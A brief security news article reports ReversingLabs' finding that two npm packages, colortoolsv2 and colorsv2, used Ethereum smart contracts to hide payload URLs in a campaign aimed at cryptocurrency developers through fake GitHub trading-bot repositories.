Thu Sep 04 10:40:00 UTC 2025: ## Malicious npm Packages Use Ethereum Smart Contracts to Hide Malware

**Cybersecurity researchers have uncovered a new tactic employed by threat actors: using Ethereum smart contracts to conceal malicious commands within npm packages.** Two newly discovered packages on the npm registry leveraged this technique to install downloader malware on compromised systems, highlighting the evolving methods used to distribute malware while avoiding detection.

ReversingLabs researcher Lucija Valentić revealed that the packages, named colortoolsv2 and colorsv2, were uploaded in July 2025 and are no longer available. They contained malicious code that fetched and executed a secondary payload from an attacker-controlled server. What sets this apart is the use of Ethereum smart contracts to store the URLs hosting the payload, a method similar to “EtherHiding.” This indicates a shift towards more sophisticated techniques to bypass traditional security measures.

The malicious packages were part of a larger campaign impacting both npm and GitHub. Attackers created seemingly legitimate GitHub projects to import the packages, tricking developers into downloading and running them. Further investigation revealed a network of GitHub repositories, posing as cryptocurrency trading bots, referencing the malicious packages. These repositories are believed to be part of a “distribution-as-service” (DaaS) offering called Stargazers Ghost Network, a network of fake GitHub accounts used to artificially inflate the popularity of malicious repositories.

The target of this campaign appears to be cryptocurrency developers and users, as the malicious repositories are designed to lure them in with promises of automated trading solutions. Researchers warn developers to be vigilant when selecting open-source libraries, emphasizing the need to thoroughly assess both the package and its maintainers. This includes looking beyond metrics such as downloads and commits to verify the legitimacy of the package and the developers behind it.

Read More